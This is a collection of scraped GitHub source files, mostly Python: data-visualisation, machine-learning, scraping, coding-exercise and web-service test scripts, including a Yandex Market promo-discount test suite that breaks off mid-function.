df[df['country'] == country].year.tolist()\n y_val = df[df['country'] == country].elec.tolist()\n graph_three.append(\n go.Scatter(\n x = x_val,\n y = y_val,\n mode = 'lines',\n name = country\n )\n )\n\n layout_three = dict(title = 'Change in Electricity Consumption
from 1990 to 2015',\n xaxis = dict(title = 'Year',\n autotick=False, tick0=1990, dtick=25),\n yaxis = dict(title = 'Electricity Consumption'),\n )\n \n# fourth chart shows rural population vs arable land\n graph_four = []\n \n valuevariables = [str(x) for x in range(1995, 2016)]\n keepcolumns = [str(x) for x in range(1995, 2016)]\n keepcolumns.insert(0, 'Country Name')\n\n df_one = cleandata('data/WB_GDP_per_capita.csv', keepcolumns = ['Country Name', '2010'], value_variables=['2010'])\n df_two = cleandata('data/WB_Labor_force.csv', keepcolumns = ['Country Name', '2010'], value_variables=['2010'])\n df_three = cleandata('data/WB_Elec_Pwr_cnsmp.csv', keepcolumns = ['Country Name', '2010'], value_variables=['2010'])\n \n df_one.columns = ['country', 'year', 'variable']\n df_two.columns = ['country', 'year', 'variable']\n df_three.columns = ['country', 'year', 'variable']\n \n df = df_one.merge(df_two, on=['country', 'year'])\n df = df.merge(df_three, on=['country', 'year'])\n\n for country in countrylist:\n x_val = df[df['country'] == country].variable_x.tolist()\n y_val = df[df['country'] == country].variable_y.tolist()\n z_val = df[df['country'] == country].variable.tolist()\n year = df[df['country'] == country].year.tolist()\n country_label = df[df['country'] == country].country.tolist()\n\n text = []\n for country, year in zip(country_label, year):\n text.append(str(country) + ' ' + str(year))\n\n graph_four.append(\n go.Scatter3d(\n x = x_val,\n y = y_val,\n z = z_val,\n text = text,\n name = country,\n textposition = 'top left'\n )\n )\n\n layout_four = dict(title = 'GDP vs Labor Force Vs
Electricity Consumption',\n xaxis = dict(xaxis_title = 'Rural Population'),\n yaxis = dict(title = 'Forest Area (square km)'),\n xaxis_title='X AXIS TITLE'\n )\n \n # append all charts to the figures list\n figures = []\n figures.append(dict(data=graph_one, layout=layout_one))\n figures.append(dict(data=graph_two, layout=layout_two))\n figures.append(dict(data=graph_three, layout=layout_three))\n figures.append(dict(data=graph_four, layout=layout_four))\n \n return figures","repo_name":"chinmaytuw/DSND_WorldBank_WebApp","sub_path":"wrangling_scripts/wrangle_data.py","file_name":"wrangle_data.py","file_ext":"py","file_size_in_byte":6967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26952101732","text":"import ast\nimport sys\n\nfrom hulks.base import BaseHook\n\n\nclass CheckPrintHook(BaseHook):\n def _show_error_message(self, filename, line_number):\n msg = \"{}, line={}: call to print found, please remove it.\"\n print(msg.format(filename, line_number))\n\n def validate(self, filename, **options):\n retval = True\n parsed_tree = ast.parse(open(filename).read(), filename)\n for node in ast.walk(parsed_tree):\n if isinstance(node, ast.Name) and node.id == \"print\":\n self._show_error_message(filename, node.lineno)\n retval = False\n return retval\n\n\ndef main(args=None):\n \"\"\"Checks 'print' usage\"\"\"\n hook = CheckPrintHook()\n sys.exit(hook.handle(args))\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"olist/hulks","sub_path":"src/hulks/check_print.py","file_name":"check_print.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"72"} +{"seq_id":"92777408","text":"T = int(input())\r\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\r\nfor test_case in range(1, T + 1):\r\n N=int(input())\r\n red =[]\r\n blue =[]\r\n for idx in range(N):\r\n x1,y1,x2,y2,color = (list(map(int, input().split())))\r\n for i in range(x1,x2+1):\r\n for j in range(y1,y2+1):\r\n if color == 1:\r\n red.append([i,j])\r\n else:\r\n blue.append([i,j])\r\n new_list=[]\r\n for r in red:\r\n if r in blue:\r\n new_list.append(r)\r\n print('#%s %d'%(test_case,len(new_list)))\r\n ","repo_name":"ms-kim520/Coding_Study","sub_path":"swea_4836_list.py","file_name":"swea_4836_list.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39645464098","text":"#utf-8\r\n\r\nimport re\r\nimport jieba\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom math import sin, asin, cos, radians, fabs, sqrt\r\n\r\nEARTH_RADIUS = 6371 #地球半径6371km\r\n\r\nemo_index = {\r\n 'anger' : 0,\r\n 'disgust': 1,\r\n 'fear' : 2,\r\n 'joy' : 3,\r\n 'sadness': 4\r\n}\r\n\r\nemo_color = {\r\n 'anger' : 'r',\r\n 'disgust': 'm',\r\n 'fear' : 'k',\r\n 'joy' : 'y',\r\n 'sadness': 'b'\r\n}\r\n\r\ncity_coord = {\r\n 'beijing' : [39.92, 116.46],\r\n 'shanghai' : [31.22, 121.48],\r\n 'guangzhou': [23.16, 113.23],\r\n 'chengdu' : [30.67, 104.06]\r\n}\r\n\r\nanger='E:/code-Python/week3/emotion_lexicon/anger.txt'\r\ndisgust='E:/code-Python/week3/emotion_lexicon/disgust.txt'\r\nfear='E:/code-Python/week3/emotion_lexicon/fear.txt'\r\njoy='E:/code-Python/week3/emotion_lexicon/joy.txt'\r\nsadness='E:/code-Python/week3/emotion_lexicon/sadness.txt'\r\n\r\ndef txt_dispart(path):\r\n '''读取文件并将location&text&user_id&created_time分开'''\r\n pass\r\n txt_new=[]\r\n dic={}\r\n with open(path,mode='r',encoding='utf-8')as f:\r\n txt=[s.rstrip() for s in f.readlines()]\r\n for item in txt:\r\n txt_new.append(item.split('\\t'))\r\n weibo_location,weibo_text,user_id,created_time=[],[],[],[]\r\n del txt_new[0]\r\n for item in txt_new:\r\n weibo_location.append(item[0])\r\n weibo_text.append(item[1])\r\n user_id.append(item[2])\r\n created_time.append(item[3])\r\n '''位置分割'''\r\n loc=[]\r\n for item in weibo_location:\r\n item.rstrip('[]')\r\n s=item.split(\",\")\r\n s[0]=float(s[0][1:])\r\n s[1]=float(s[1][1:-1])\r\n loc.append(s)\r\n dic['location']=loc\r\n dic['word']=weibo_text\r\n dic['id']=user_id\r\n '''时间分割'''\r\n t=[]\r\n for item in created_time:\r\n t.append(item.split(\" \"))\r\n dic['time']=t\r\n return dic\r\n \r\ndef txt_add(anger,disgust,fear,joy,sadness):\r\n '''将情绪词文件加入jieba库的自定义词典'''\r\n pass\r\n jieba.load_userdict(anger)\r\n jieba.load_userdict(disgust)\r\n jieba.load_userdict(fear)\r\n jieba.load_userdict(joy)\r\n jieba.load_userdict(sadness)\r\n return 1\r\n\r\ndef txt_read(path):\r\n '''txt文件读取'''\r\n pass\r\n with open(path,mode = 'r',encoding='utf-8') as file:\r\n txt=[s.rstrip() for s in file.readlines()]\r\n txt.append(\" \")\r\n return txt\r\n\r\ndef data_wash(word,stopwords):\r\n '''进行数据清洗'''\r\n pass\r\n after=[]\r\n URL_REGEX = re.compile('(http|ftp|https):\\/\\/[\\w\\-_]+(\\.[\\w\\-_]+)+([\\w\\-\\.,@?^=%&:/~\\+#]*[\\w\\-\\@?^=%&/~\\+#])?',\r\n re.IGNORECASE)\r\n for text in word:\r\n text = re.sub(URL_REGEX,\"\",text)#去除网址\r\n text = re.sub(r'[0-9.?,@\\t]+','',text)#去除数字及部分符号\r\n after.append([word for word in jieba.lcut(text) if word not in stopwords])\r\n return after\r\n\r\ndef create_emo_vec(word,anger,disgust,fear,joy,sadness):\r\n '''构建情绪向量'''\r\n pass\r\n emo_lis=[]\r\n emo_lis.append(txt_read(anger))\r\n emo_lis.append(txt_read(disgust))\r\n emo_lis.append(txt_read(fear))\r\n emo_lis.append(txt_read(joy))\r\n emo_lis.append(txt_read(sadness))\r\n def emo_vec():\r\n '''构建向量'''\r\n nonlocal word,emo_lis\r\n stand=[0,0,0,0,0,0] #[anger,disgust,fear,joy,sadness,max_index]\r\n for item in word:\r\n for i in range(5):\r\n if item in emo_lis[i]:\r\n stand[i]+=1\r\n '''标准化向量'''\r\n s=sum(stand)\r\n if s!=0:\r\n for i in range(5):\r\n stand[i]/=s\r\n '''寻找MAX'''\r\n stand[5]=stand.index(max(stand))\r\n else:#没有情绪词\r\n stand[5]=-1\r\n return stand\r\n return emo_vec\r\n\r\ndef paint_time(word,data,mode,*emos):\r\n '''输入模式以及情绪类型得到情绪强度-时间折线图'''\r\n pass\r\n plt.figure(num=1)\r\n if mode == 'week':\r\n x = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\r\n for emo in emos:\r\n y = [0] * 7\r\n y_total = [0] * 7\r\n ind=0\r\n for item in data['time']:\r\n i = x.index(item[0])\r\n y[i]+=create_emo_vec(word[ind],anger,disgust,fear,joy,sadness)()[emo_index[emo]]\r\n y_total[i] += 1\r\n ind+=1\r\n for i in range(7):\r\n if y_total[i]!=0:\r\n y[i] /= y_total[i]\r\n plt.plot(x, y, emo_color[emo])\r\n\r\n if mode == 'day':\r\n x = list(range(30))\r\n for emo in emos:\r\n y = [0] * 30\r\n y_total = [0] * 30\r\n ind=0\r\n for item in data['time']:\r\n i = int(item[2])\r\n y[i] +=create_emo_vec(word[ind],anger,disgust,fear,joy,sadness)()[emo_index[emo]]\r\n y_total[i] += 1\r\n ind+=1\r\n for i in range(24):\r\n if y_total[i]!=0:\r\n y[i] /= y_total[i]\r\n plt.plot(x, y, emo_color[emo])\r\n plt.xticks(x) \r\n plt.legend(emos)\r\n plt.show()\r\n\r\ndef get_distance(coord1, coord2):\r\n '''用haversine公式计算球面两点间的距离'''\r\n def hav(theta):\r\n s = sin(theta / 2)\r\n return s * s\r\n\r\n lat1 = radians(coord1[0])\r\n lng1 = radians(coord1[1])\r\n lat2 = radians(coord2[0])\r\n lng2 = radians(coord2[1])\r\n dlng = fabs(lng1 - lng2)\r\n dlat = fabs(lat1 - lat2)\r\n h = hav(dlat) + cos(lat1) * cos(lat2) * hav(dlng)\r\n distance = 2 * EARTH_RADIUS * asin(sqrt(h))\r\n return distance\r\n\r\ndef paint_loc(word,data,city,*emos):\r\n '''输入城市以及情绪得到情绪变化-半径折线图'''\r\n pass\r\n plt.figure(num=2)\r\n center = city_coord[city]\r\n dist_emo_list = []\r\n ind=0\r\n for item in data['location']:\r\n if (abs(item[0] - center[0]) < 2) and (abs(item[1] - center[1]) < 2):\r\n dist_emos = [get_distance(center, item),]\r\n for emo in emos:\r\n dist_emos.append(create_emo_vec(word[ind],anger,disgust,fear,joy,sadness)()[emo_index[emo]])\r\n dist_emo_list.append(dist_emos)\r\n ind+=1\r\n dist_emo_list = sorted(dist_emo_list, key = (lambda x:x[0])) # 按与中心的距离排序\r\n \r\n count = 0\r\n emo = [0,] * len(emos)\r\n x = list(np.arange(0, 10, 0.1))\r\n ys = []\r\n for i in x:\r\n while dist_emo_list[count][0] < i:\r\n for j in range(len(emos)):\r\n emo[j] += dist_emo_list[count][j + 1]\r\n count += 1\r\n if count != 0: ys.append([e / count for e in emo])\r\n else: ys.append([e / 1.0 for e in emo])\r\n for i in range(len(emos)):\r\n y = [x[i] for x in ys]\r\n plt.plot(x, y, emo_color[emos[i]])\r\n \r\n plt.legend(emos)\r\n plt.show()\r\n\r\ndef main():\r\n data=txt_dispart('E:/code-Python/week3/test.txt')\r\n txt_add(anger,disgust,fear,joy,sadness)\r\n word=data_wash(data['word'],txt_read('E:/code-Python/week2/stopwords_list.txt'))\r\n paint_time(word,data,'week','joy','disgust')\r\n '''paint_time(word,data,'day','sadness','fear')'''\r\n paint_loc(word,data,'beijing','joy','sadness')\r\n\r\nmain()","repo_name":"Dream-cli/Design_Homework","sub_path":"emotion.py","file_name":"emotion.py","file_ext":"py","file_size_in_byte":7115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22428159269","text":"from keras.layers import Activation, Convolution2D, Dense, Dropout, Flatten, MaxPooling2D, GlobalAveragePooling2D\nfrom keras.models import Sequential, Model\nfrom keras.applications.xception import preprocess_input\nfrom keras.applications import Xception, InceptionV3\nfrom keras.optimizers import RMSprop\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import ModelCheckpoint, TensorBoard\nfrom keras.models import load_model\n\ndef create_transfer_model(input_size, n_categories, weights = 'imagenet'):\n\n base_model = Xception(weights=weights,\n include_top=False,\n input_shape=input_size)\n\n model = base_model.output\n model = GlobalAveragePooling2D()(model)\n predictions = Dense(n_categories, activation='softmax')(model)\n model = Model(inputs=base_model.input, outputs=predictions)\n\n return model\n\ndef change_trainable_layers(model, trainable_index):\n\n for layer in model.layers[:trainable_index]:\n layer.trainable = False\n for layer in model.layers[trainable_index:]:\n layer.trainable = True\n\n\n\nif __name__=='__main__':\n model=create_transfer_model([75,75,3],5)\n train=ImageDataGenerator(preprocessing_function=preprocess_input).flow_from_directory('data/holdout',target_size=[75,75],batch_size=27)\n validate=ImageDataGenerator(preprocessing_function=preprocess_input).flow_from_directory('data/train2/asl_alphabet_test',[75,75],batch_size=27)\n tensor=TensorBoard(log_dir='./tens_logs', histogram_freq=0, batch_size=27, write_graph=True, write_grads=False, write_images=False)\n callbacks = ModelCheckpoint('./last_tl_log',save_best_only=True)\n # holdout_folder = ImageDataGenerator(preprocessing_function=preprocess_input).flow_from_directory('../data/holdout_small',[100,100],batch_size=16)\n # metrics = best_model.evaluate_generator(holdout_folder, steps=11)\n # print(metrics)\n trans_model = create_transfer_model((75,75,3),27)\n _ = change_trainable_layers(trans_model, 132)\n trans_model.compile(optimizer=RMSprop(lr=0.0005), loss='categorical_crossentropy', metrics=['accuracy'])\n trans_model.fit_generator(train, epochs=10, steps_per_epoch=30, validation_data=validate,validation_steps=5, callbacks=[callbacks, tensor])\n _ = change_trainable_layers(trans_model, 126)\n trans_model.compile(optimizer=RMSprop(lr=0.0005), loss='categorical_crossentropy', metrics=['accuracy'])\n trans_model.fit_generator(train, epochs=50, steps_per_epoch=30, validation_data=validate,validation_steps=5, callbacks=[callbacks, tensor])\n","repo_name":"MathiasStensrud/capstone-2","sub_path":"tl.py","file_name":"tl.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13575111118","text":"import re\n# parse file\nfname = \"adventofcode22/python/d4/input.txt\"\nwith open(fname) as f:\n lines = []\n for line in f:\n a=line.strip('\\n').split(',')\n lines.append(a)\ntotal = 0\ntotal1 = 0\nfor i in lines:\n #process numbers\n numlist = re.findall(r'\\d+', i[0])\n numlist1 = re.findall(r'\\d+', i[1])\n startnum = int(numlist[0])\n endnum = int(numlist[1])\n startnum1 = int(numlist1[0])\n endnum1 = int(numlist1[1])\n \n # checklist = []\n # checklist2 = []\n # for i in range (int(startnum),int(endnum)):\n # checklist.append(str(i))\n # for i in range (int(startnum1),int(endnum1)):\n # checklist2.append(str(i))\n # if (startnum1 in checklist and endnum1 in checklist):\n # total+=1\n # elif (startnum in checklist2 and endnum in checklist2):\n # total+=1\n \n #check conditions\n if((startnum<=startnum1) and (endnum>=endnum1)):\n total+=1\n total1+=1\n elif((startnum1<=startnum) and (endnum1>=endnum)):\n total +=1\n total1+=1\n \n #part 2 \n elif(startnum<=startnum1 and startnum1<=endnum):\n total1+=1\n elif(startnum1<=startnum and startnum<=endnum1):\n total1+=1\n \nprint(total)\nprint(total1)","repo_name":"jiajingan/AOC","sub_path":"adventofcode22/python/d04/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12703029168","text":"import cv2 as cv\n\nimg = cv.imread('Photos/cat.jpeg')\n\ngray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\ncv.imshow('Gray', gray)\n\nthreshold, thresh = cv.threshold(gray, 150, 255, cv.THRESH_BINARY)\ncv.imshow('Simple Threshold', thresh)\n\nthreshold, thresh_inv = cv.threshold(gray, 150, 255, cv.THRESH_BINARY_INV)\ncv.imshow('Simple Inverse Threshold', thresh_inv)\n\nadaptive_thresh = cv.adaptiveThreshold(gray, 255, cv.ADAPTIVE_THRESH_MEAN_C, cv.THRESH_BINARY, 11, 3)\ncv.imshow('Adaptive Threshold', adaptive_thresh)\n\ncv.waitKey(0)","repo_name":"bibinss/opencv","sub_path":"thresh.py","file_name":"thresh.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40824036307","text":"\"\"\"\nQuestion 2\nLevel 1\n\nQuestion:\nWrite a program which can compute the factorial of a given numbers.\nThe results should be printed in a comma-separated sequence on a single line.\nSuppose the following input is supplied to the program:\n8\nThen, the output should be:\n40320\n\nHints:\nIn case of input data being supplied to the question, it should be assumed to be a console input.\n\n\"\"\"\ndef factorial(n):\n if n == 0:\n return 1\n else:\n return n * factorial(n-1)\nn=int(input(\"Input a number to compute the factiorial : \"))\nprint(factorial(n))\n\n\n\n","repo_name":"Patibandha/PD008bootcamp","sub_path":"Exercises_Answer/Exercise2.py","file_name":"Exercise2.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15823553001","text":"from articles.models import Article\nfrom articles.scripts import feed\nimport time\n\ndef run_dayily_schedule(crollers):\n count = 0\n for croller in crollers:\n croller = croller()\n for title, url, preface, img_url in croller.feed():\n if Article.objects.filter(url=url).exists():\n continue\n article = Article(title=title, url=url, preface=preface, img_url=img_url)\n print(vars(article))\n article.save()\n count += 1\n time.sleep(10)\n print('{0} articles registered.'.format(count))\n\nrun_dayily_schedule(feed.CROLLERS)\n\nif __name__ == '__main__':\n run_dayily_schedule(feed.CROLLERS)\n","repo_name":"yasunt/famo","sub_path":"articles/scripts/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18011633877","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom google.cloud import translate_v2 as translate\n\n# Define the website URL to translate\nurl = \"https://www.example.com\"\n\n# Define the target language\ntarget_language = \"hi\"\n\n# Set up the Google Cloud Translation API\ntranslate_client = translate.Client()\n\n# Get the website content\nresponse = requests.get(url)\nsoup = BeautifulSoup(response.text, \"html.parser\")\n\n# Extract the text content from the website\ntext = \"\"\nfor element in soup.find_all(text=True):\n text += f\"{element} \"\n\n# Translate the text content to Hindi\nresult = translate_client.translate(text, target_language=target_language)\n\n# Print the translated text\nprint(result[\"input\"])\nprint(result[\"translatedText\"])\n\n","repo_name":"OkechEdu/Website-Crawler","sub_path":"hindi-scrapper-ggogle-translate.py","file_name":"hindi-scrapper-ggogle-translate.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31283577488","text":"import sys\nimport platform\nimport atexit\n\n\nclass NullDisplay(object):\n \"\"\"\n Dummy renderer for a Game of Life board or nested list\n\n This renderer does nothing.\n \"\"\"\n def __init__(self, *args):\n pass\n\n def show(self, gol, title=''):\n pass\n\n\nclass TextDisplay(object):\n \"\"\"\n Renderer for a Game of Life board or nested list for text terminals\n\n :param height: the maximum height to display the board\n :type height: int\n :param width: the maximum width to display the board\n :type width: int\n\n This renderer requires ANSII support by the terminal.\n \"\"\"\n def __init__(self, height=128, width=128):\n self.height = height\n self.width = width\n\n def show(self, gol, title='<Title>'):\n self._show_array(gol, title=title)\n\n def _show_array(self, gol_array, title):\n sys.stdout.write(\"\\x1b[H\")\n draw_width = min(self.width, gol_array.width)\n print('-', title, '-' * max(draw_width - 3 - len(title), 0))\n for h in range(min(self.height, gol_array.height)):\n row = gol_array[h]\n print(''.join('#' if row[w] else ' ' for w in range(min(self.width, gol_array.width))))\n print('-' * gol_array.width)\n\n\nclass NativeMPLDisplay(object):\n \"\"\"\n Renderer for a Game of Life board or nested list for text terminals\n\n :param height: the maximum height to display the board\n :type height: int\n :param width: the maximum width to display the board\n :type width: int\n\n This renderer requires :py:mod:`matplotlib`.\n \"\"\"\n def __init__(self, height=640, width=640):\n from matplotlib import pyplot\n self.height = height\n self.width = width\n pyplot.draw()\n\n def show(self, gol, title='<Title>'):\n self._show_mpl(gol, title=title)\n\n def _show_mpl(self, gol_array, title):\n from matplotlib import pyplot\n draw_height = min(self.height, gol_array.height)\n draw_width = min(self.width, gol_array.width)\n content = []\n for line_idx in range(draw_height):\n line = gol_array[line_idx]\n content.append([line[row_idx] for row_idx in range(draw_width)])\n pyplot.clf()\n pyplot.title(title)\n pyplot.imshow(content)\n pyplot.pause(0.000001)\n\nMPLDisplay = NativeMPLDisplay\n\n__all__ = ['TextDisplay', 'MPLDisplay', 'NullDisplay']\n","repo_name":"MaineKuehn/workshop-collaborative_software","sub_path":"gksolite/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"73438400552","text":"with open('input.txt') as file:\n lines = [line.rstrip() for line in file]\n\nmost = 0\nsum = 0\n\nfor line in lines:\n if (line == ''):\n if (sum > most):\n most = sum\n sum = 0\n else:\n sum = sum + int(line)\n\nprint(most)\n","repo_name":"lhammarstrom/aoc","sub_path":"2022/1/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"183239239","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport runner # noqa\n\nfrom core.matcher import Absent, NotEmpty\nfrom core.report import REQUEST_TIMESTAMP\nfrom core.testcase import TestCase, main\nfrom core.types import DynamicBlueGenericBundlesPromos, DynamicPromo, Promo, PromoType\nfrom core.types.offer_promo import (\n PromoDirectDiscount,\n PromoSpreadDiscountCount,\n PromoCheapestAsGift,\n)\nfrom core.types.sku import MarketSku, BlueOffer\nfrom core.types.autogen import b64url_md5\nfrom core.types.dynamic_filters import DynamicPromoKeysBlacklist\n\nfrom datetime import datetime, timedelta\nfrom itertools import count\nfrom math import floor\n\n\nnow = datetime.fromtimestamp(REQUEST_TIMESTAMP)\ndelta_big = timedelta(days=1)\ndelta_small = timedelta(hours=5)\n\n\nFEED_ID = 777\nDEFAULT_HID = 8001\nHID_1 = 8002\n\nnummer = count()\n\n\ndef get_offer_id(x):\n return 'offer_id_{}'.format(x)\n\n\ndef __blue_offer(offer_id, price=1000, price_old=1000, is_fulfillment=True):\n num = next(nummer)\n return BlueOffer(\n waremd5=b64url_md5(num),\n price=price,\n price_old=price_old,\n fesh=FEED_ID,\n feedid=FEED_ID,\n offerid=get_offer_id(offer_id),\n is_fulfillment=is_fulfillment,\n )\n\n\ndef __msku(offers, hid):\n num = next(nummer)\n return MarketSku(sku=num, hyperid=num, hid=hid, blue_offers=offers if isinstance(offers, list) else [offers])\n\n\n###############################################################################################################\nblue_offer_for_one_promo = __blue_offer(offer_id=next(nummer), price=890, price_old=1000, is_fulfillment=True)\nmsku_for_single_promo = __msku(\n [\n blue_offer_for_one_promo,\n ],\n DEFAULT_HID,\n)\n\n# Действующая акция с двумя порогами скидки.\npromo_sdc_single = Promo(\n promo_type=PromoType.SPREAD_DISCOUNT_COUNT,\n description='spread discount normal',\n feed_id=FEED_ID,\n key=b64url_md5(next(nummer)),\n url='http://spdc_1.com/',\n landing_url='http://spdc_1_landing.com/',\n shop_promo_id='spread_discount_count_single',\n spread_discount_count=PromoSpreadDiscountCount(\n items={\n msku_for_single_promo.sku: [{'count': 3, 'percent_discount': 7}, {'count': 5, 'percent_discount': 13}],\n }\n ),\n)\nblue_offer_for_one_promo.promo = promo_sdc_single\n\n\n###############################################################################################################\nblue_offer_for_two_promos = __blue_offer(offer_id=next(nummer), price=890, price_old=1000, is_fulfillment=False)\nmsku_for_two_promos = __msku(\n [\n blue_offer_for_two_promos,\n ],\n DEFAULT_HID,\n)\n\n# Действующая акция одним порого скидки. Скидка должна складываться с \"прямой скидкой\".\npromo_sdc_two_promos = Promo(\n promo_type=PromoType.SPREAD_DISCOUNT_COUNT,\n description='spread discount with direct discount',\n feed_id=FEED_ID,\n key=b64url_md5(next(nummer)),\n url='http://spdc_2.com/',\n landing_url='http://spdc_2_landing.com/',\n shop_promo_id='spread_discount_count_two_promos',\n spread_discount_count=PromoSpreadDiscountCount(\n items={\n msku_for_two_promos.sku: [{'count': 3, 'percent_discount': 7}, {'count': 5, 'percent_discount': 13}],\n }\n ),\n)\n\npromo_dd_two_promos = Promo(\n promo_type=PromoType.DIRECT_DISCOUNT,\n description='direct discount with spread discount',\n key=b64url_md5(next(nummer)),\n url='http://direct_discount_1.com/',\n direct_discount=PromoDirectDiscount(\n items=[\n {\n 'feed_id': FEED_ID,\n 'offer_id': blue_offer_for_two_promos.offerid,\n 'discount_price': {'value': 800, 'currency': 'RUR'},\n }\n ],\n ),\n)\nblue_offer_for_two_promos.promo = [promo_sdc_two_promos, promo_dd_two_promos]\n\n\n###############################################################################################################\nblue_offer_for_too_low_discount = __blue_offer(offer_id=next(nummer), price=90, is_fulfillment=True)\nmsku_for_too_low_discount = __msku(\n [\n blue_offer_for_too_low_discount,\n ],\n DEFAULT_HID,\n)\n\n# Действующая акция маленькой скидкой\npromo_sdc_too_low_discount = Promo(\n promo_type=PromoType.SPREAD_DISCOUNT_COUNT,\n description='spread discount with low discount',\n feed_id=FEED_ID,\n key=b64url_md5(next(nummer)),\n url='http://spdc_3.com/',\n landing_url='http://spdc_3_landing.com/',\n shop_promo_id='spread_discount_count_too_low_discount',\n spread_discount_count=PromoSpreadDiscountCount(\n items={\n msku_for_too_low_discount.sku: [{'count': 11, 'percent_discount': 1}],\n }\n ),\n)\nblue_offer_for_too_low_discount.promo = promo_sdc_too_low_discount\n\n\n###############################################################################################################\nblue_offer_loose_for_cg = __blue_offer(offer_id=next(nummer), price=900, is_fulfillment=True)\nmsku_loose_for_cg = __msku(\n [\n blue_offer_loose_for_cg,\n ],\n DEFAULT_HID,\n)\n\n# Действующая акция spread discount count\npromo_sdc_loose_for_cg = Promo(\n promo_type=PromoType.SPREAD_DISCOUNT_COUNT,\n description='spread discount loosing cheapest as gift',\n feed_id=FEED_ID,\n key=b64url_md5(next(nummer)),\n url='http://spdc_4.com/',\n landing_url='http://spdc_4_landing.com/',\n shop_promo_id='spread_discount_count_loose_for_cg',\n spread_discount_count=PromoSpreadDiscountCount(\n items={\n msku_loose_for_cg.sku: [{'count': 11, 'percent_discount': 6}],\n }\n ),\n)\n\n# Действующая акция cheapest as gift\npromo_cg_win = Promo(\n promo_type=PromoType.CHEAPEST_AS_GIFT,\n key=b64url_md5(next(nummer)),\n url='http://localhost.ru/',\n cheapest_as_gift=PromoCheapestAsGift(\n offer_ids=[\n (FEED_ID, blue_offer_loose_for_cg.offerid),\n ],\n count=3,\n promo_url='',\n link_text='text',\n ),\n)\nblue_offer_loose_for_cg.promo = [promo_sdc_loose_for_cg, promo_cg_win]\n\n\nclass T(TestCase):\n @classmethod\n def prepare(cls):\n cls.settings.default_search_experiment_flags += ['enable_fast_promo_matcher=0;enable_fast_promo_matcher_test=1']\n\n cls.index.mskus += [msku_for_single_promo, msku_for_two_promos, msku_for_too_low_discount, msku_loose_for_cg]\n\n cls.index.promos += [\n promo_sdc_single,\n promo_sdc_two_promos,\n promo_dd_two_promos,\n promo_sdc_too_low_discount,\n promo_sdc_loose_for_cg,\n promo_cg_win,\n ]\n\n cls.settings.loyalty_enabled = True\n cls.dynamic.loyalty += [DynamicBlueGenericBundlesPromos(whitelist=[promo.key for promo in cls.index.promos])]\n\n def __calc_discount_percent(self, old_price, new_price):\n return int(floor((1 - 1.0 * new_price / old_price) * 100.0 + 0.5))\n\n def __check_present_promo_fragment(self, response, promo, msku, offer):\n\n # Проверяем что в выдаче есть оффер с корректным блоком 'promos'\n self.assertFragmentIn(\n response,\n [\n {\n 'entity': 'offer',\n 'wareId': offer.waremd5,\n 'prices': {\n 'value': str(offer.price),\n 'currency': 'RUR',\n },\n 'promos': [promo.spread_discount_count.promo_fragment(offer, msku)],\n }\n ],\n allow_different_len=False,\n )\n\n def __check_absent_promo_fragment(self, response, waremd5):\n # Проверяем, что блок промо отсутствует\n self.assertFragmentIn(\n response,\n [\n {\n 'entity': 'offer',\n 'wareId': waremd5,\n 'promos': Absent(),\n }\n ],\n )\n\n # Проверяем, что в ответе репорта есть блок promo\n def check_promo(self, check_present, promo, msku, offer, rearr_flags=None, add_url=\"\"):\n for rgb in ('blue', 'green', 'green_with_blue'):\n for place in ('sku_offers', 'prime'):\n for rearr_flag in rearr_flags or (None,):\n request = 'place={place}&rids=0®set=1&pp=18&market-sku={msku}&rgb={rgb}'\n if rearr_flag is not None:\n request += '&rearr-factors=market_promo_spread_discount_count={}'.format(rearr_flag)\n request = request.format(place=place, msku=msku, rgb=rgb)\n request += add_url\n response = self.report.request_json(request)\n\n if check_present:\n self.__check_present_promo_fragment(response, promo, msku, offer)\n else:\n self.__check_absent_promo_fragment(response, offer.waremd5)\n\n def test_spread_discount_count_active(self):\n \"\"\"\n Проверяем стандартный сценарий наличия прогрессирующей скидки от количества\n \"\"\"\n\n # Без флага и с флагом market_promo_blue_spread_discount_count=1 промо есть на выдаче\n self.check_promo(\n True, promo_sdc_single, msku_for_single_promo.sku, blue_offer_for_one_promo, rearr_flags=[None, 1]\n )\n # C флагом market_promo_spread_discount_count=0 промо нет на выдаче\n self.check_promo(False, promo_sdc_single, msku_for_single_promo.sku, blue_offer_for_one_promo, rearr_flags=[0])\n\n def test_spread_discount_count_whitelist(self):\n \"\"\"\n Проверяем, что без 